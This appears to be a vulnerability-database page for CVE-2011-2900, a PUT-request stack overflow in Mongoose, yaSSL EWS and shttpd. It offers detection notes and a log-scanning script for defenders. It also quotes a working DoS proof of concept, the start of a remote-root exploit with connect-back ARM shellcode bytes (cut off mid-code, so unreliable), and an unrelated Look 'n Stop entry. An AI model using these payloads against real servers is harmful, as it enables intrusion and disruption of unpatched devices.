CVE-2011-2900
Published 2011-08-05
CVE-2011-2900: Stack-based buffer overflow in the (1) put_dir function in mongoose.c in Mongoose 3.0, (2) put_dir function in yasslEWS.c in yaSSL Embedded Web Server…
Priority: P2 · 73 · high · 7.5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 13.26% (95.9th percentile)
Stack-based buffer overflow in the (1) put_dir function in mongoose.c in Mongoose 3.0, (2) put_dir function in yasslEWS.c in yaSSL Embedded Web Server (yasslEWS) 0.2, and (3) _shttpd_put_dir function in io_dir.c in Simple HTTPD (shttpd) 1.42 allows remote attackers to execute arbitrary code via an HTTP PUT request, as exploited in the wild in 2011.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| shttpd | shttpd | — | — |
| valenok | mongoose | — | — |
| yassl | yasslews | — | — |
Detection & IOCs (extracted from sources)
Indicator bytes:
%01%10%8F%E2%11%FF%2F%E1%02%20%01%21%92%1A%0F%02%19%37%01%DF%06%1C%08%A1%10%22%02%37%01%DF%3F%27%02%21%30%1c%01%df%01%39%FB%D5%05%A0%92%1A%05%b4%69%46%0b%27%01%DF%C0%46%02%00%11%5c
- Detect HTTP PUT requests with excessively long path segments (>107 bytes) targeting the root or directory paths, indicative of buffer overflow exploitation against put_dir()
- Look for the ARM connect-back shellcode pattern in the HTTP PUT request body/path: URL-encoded bytes starting with %01%10%8F%E2%11%FF%2F%E1
- The exploit targets port 80 with HTTP/1.0 PUT requests; monitor for the repeated stack-lifting gadget pattern '%a0%ce%31%40' appearing multiple times (26+) in a single PUT request URI
- The vulnerability is only exploitable for RCE when the server is NOT compiled with -DNDEBUG; when compiled with assert enabled (default Fedora), the result is DoS only via assert abort
- Exploitation was observed in the wild in 2011 against sfr/ubiquisys femtocell webservers running shttpd/mongoose; prioritize detection on embedded/IoT HTTP servers
- RCE is only achievable when the vulnerable server is compiled WITHOUT -DNDEBUG; servers compiled with assert enabled (e.g., default Fedora builds) will crash/DoS instead of allowing code execution
- The RCE exploit's shellcode address (SHELLCODE = 0xbc568) and heap layout assumptions are specific to the sfr/ubiquisys femtocell target where the heap is not randomized; ASLR-enabled systems require different offsets
- The RCE exploit uses ARM-architecture ROP gadgets and shellcode; it is not directly applicable to x86/x86-64 deployments of the same vulnerable software
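The three request-level indicators above (oversized PUT path segment, the URL-encoded shellcode prefix, and the repeated stack-lift gadget) turned into a small request-log scanner. This is an added example, not code from this aggregator or from any of the quoted sources; the thresholds it uses (107-byte segment, the %01%10%8F%E2%11%FF%2F%E1 prefix, 26 repetitions of %a0%ce%31%40) are taken from the notes above, and the request lines it scans are constructed samples, not captured traffic.

```python
import re
from urllib.parse import unquote_to_bytes

# Thresholds and byte patterns come from the detection notes on this page.
MAX_SEGMENT_BYTES = 107
SHELLCODE_PREFIX = "%01%10%8F%E2%11%FF%2F%E1"
STACK_LIFT_GADGET = "%a0%ce%31%40"
STACK_LIFT_THRESHOLD = 26

# Request line as it appears in an access log or a raw capture: METHOD SP target SP HTTP/x.y
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/(?P<ver>\d\.\d)$")


def analyze_request_line(line):
    """Return the list of indicator names that fire for one HTTP request line.

    Only PUT requests are examined, since the overflow sits in put_dir().
    """
    m = REQUEST_LINE.match(line.strip())
    if not m or m.group("method") != "PUT":
        return []
    target = m.group("target")
    path = target.split("?", 1)[0]
    findings = []

    # 1. Oversized path segment: compare the percent-decoded length of each
    #    segment, because the server decodes the URI before copying it into
    #    the fixed-size stack buffer.
    for segment in path.split("/"):
        if len(unquote_to_bytes(segment)) > MAX_SEGMENT_BYTES:
            findings.append("long_path_segment")
            break

    # 2. Known ARM connect-back shellcode prefix; hex digits in URL encoding
    #    may be upper or lower case, so compare case-insensitively.
    if SHELLCODE_PREFIX.lower() in target.lower():
        findings.append("arm_shellcode_prefix")

    # 3. Stack-lifting gadget repeated many times in a single URI.
    if target.lower().count(STACK_LIFT_GADGET.lower()) >= STACK_LIFT_THRESHOLD:
        findings.append("repeated_stack_lift_gadget")

    return findings


def scan_log(lines):
    """Map the index of each suspicious request line to its findings; benign lines are omitted."""
    results = {}
    for index, line in enumerate(lines):
        findings = analyze_request_line(line)
        if findings:
            results[index] = findings
    return results


# Constructed sample request lines (assumption: one request line per log entry).
SAMPLE_LINES = [
    "GET /index.html HTTP/1.1",
    "PUT /uploads/report.txt HTTP/1.1",              # benign PUT, short segment
    "PUT /" + "A" * 6000 + "/ HTTP/1.0",             # shape of the DoS PoC quoted on this page
    "PUT /" + "A" * 107 + "%a0%ce%31%40" * 30 + " HTTP/1.0",  # fill plus repeated gadget
    "PUT /x/%01%10%8f%e2%11%ff%2f%e1%02%20 HTTP/1.0",         # shellcode prefix, lower-case hex
]

if __name__ == "__main__":
    for index, findings in scan_log(SAMPLE_LINES).items():
        print(index, findings)
```

The segment-length check decodes before measuring so that a payload padded with percent-encoded bytes is not under-counted; the two byte-pattern checks are cheap substring matches and are best used together with the length check, since the gadget and shellcode values are specific to the ARM femtocell exploit described above and a different payload would not carry them.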
CVSS provenance
nvd (CVSS v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck: 7.5 HIGH
GHSA
GHSA-3jhp-7x6r-7792 (ghsa_unreviewed · 2022-05-17 · HIGH · CWE-119): Stack-based buffer overflow in the (1) put_dir function in mongoose
VulnCheck
shttpd shttpd: Improper Restriction of Operations within the Bounds of a Memory Buffer (vulncheck · 2011 · CVSS 7.5 · HIGH)
Affected: shttpd shttpd
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://nvd.nist.gov/vuln/detail/CVE-2011-2900; https://www.cve.org/CVERecord?id=CVE-2011-2900
No detection rules found.
Exploit-DB
Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow (exploitdb · 2011-08-15 · CVSS 7.5 · HIGH)
---
#!/usr/bin/env python
# part of femtocell research by TU-Berlin
# only for educational purposes
# Exploit Title: remote root on sfr/ubiquisys femtocell webserver (wsal/shttpd/mongoose)
# Date: 2011-08-02
# Author: nion
# Software: http://code.google.com/p/mongoose/ http://sourceforge.net/projects/shttpd/
# Version: shttpd "
sys.exit(-1)
target = sys.argv[1]
listener = sys.argv[2]
SHELLCODE = 0xbc568 # shellcode backup in connect struct, heap is not randomized
STACK_LIFT = "%a0%ce%31%40" # didnt want to use urllib to encode at this point
# because it moves the heap address depending on if character is printable or not
# and i was too lazy to adjust the payload when cleaning up the exploit :)
buf = "PUT /"
buf += "A" * 107 # first fil
Exploit-DB
Simple HTTPd 1.42 - Denial of Service (exploitdb · 2011-08-12)
---
#!/usr/bin/python
# Exploit Title: Simple HTTPd 1.42 PoC DoS
# Date: 8/10/2011
# Author: G13
# Software Link: http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download
# Version: 1.42
# Tested on: WinXP SP1
# CVE : 2011-2900
#
# Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit
# still works.
# Simple HTTPd is still affected by the bug. The executable must be
# compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled
# under MinGW.
import socket, sys
buf = "A" * 6000
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.101',80))
s.send("PUT /" + buf + "/ HTTP/1.0\r\n")
s.send("\r\n")
print s.recv(1024)
s.close()
Exploit-DB
Look n stop - Local Denial of Service (exploitdb · 2011-01-21 · CVE-2011-0652)
---
#include
#include
#include
#include
#include
/*
Program : Look 'n' Stop 2.06p4 / 2.07 (6.0.2900.5512)
Homepage : http://www.looknstop.com
Discovery : 2009/11/08
Author Contacted : 2010/07/15 ... no reply
Found by : Heurs
This Advisory : Heurs
Contact : [email protected]
//----- Application description
Look 'n' Stop Firewall 2.07 provides key features to protect your computer
against cyber threats. It prevents malicious programs from transmitting the
data of your computer to hacker's computers. Look 'n' Stop Firewall 2.07
also protects your computer from external intrusions.
//----- Description of vulnerability
The lnsfw1.sys driver generates a BSOD with a particular IOCTL value. The kernel
waits for an action from a kernel debugger.
//----- Credit
Bugzilla
CVE-2011-2900 mongoose: stack-based buffer overflow flaw in put_dir() [fedora-all] (bugzilla · 2011-08-08 · CVSS 7.5 · HIGH)
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=729145
Please note: this issue affects
Bugzilla
CVE-2011-2900 mongoose: stack-based buffer overflow flaw in put_dir() (bugzilla · 2011-08-08 · CVSS 7.5 · HIGH)
Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2900 to
the following vulnerability:
Name: CVE-2011-2900
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2900
Assigned: 20110727
Reference: http://www.openwall.com/lists/oss-security/2011/08/03/5
Reference: http://www.openwall.com/lists/oss-security/2011/08/03/9
Reference: https://code.google.com/p/mongoose/source/detail?r=556f4de91eae4bac40dc5d4ddbd9ec7c424711d0
Reference: http://www.securityfocus.com/bid/48980
Reference: http://secunia.com/advisories/45464
Reference: http://xforce.iss.net/xforce/xfdb/68991
Stack-based buffer overflow in the (1) put_dir function in mongoose.c
in Mongoose 3.0, (2) put_dir function in yasslEWS.c in yaSSL E
References
- http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065273.html
- http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065505.html
- http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065537.html
- http://secunia.com/advisories/45464
- http://secunia.com/advisories/45902
- http://securityreason.com/securityalert/8337
- http://www.openwall.com/lists/oss-security/2011/08/03/5
- http://www.openwall.com/lists/oss-security/2011/08/03/9
- http://www.securityfocus.com/bid/48980
- https://code.google.com/p/mongoose/source/detail?r=556f4de91eae4bac40dc5d4ddbd9ec7c424711d0
- https://exchange.xforce.ibmcloud.com/vulnerabilities/68991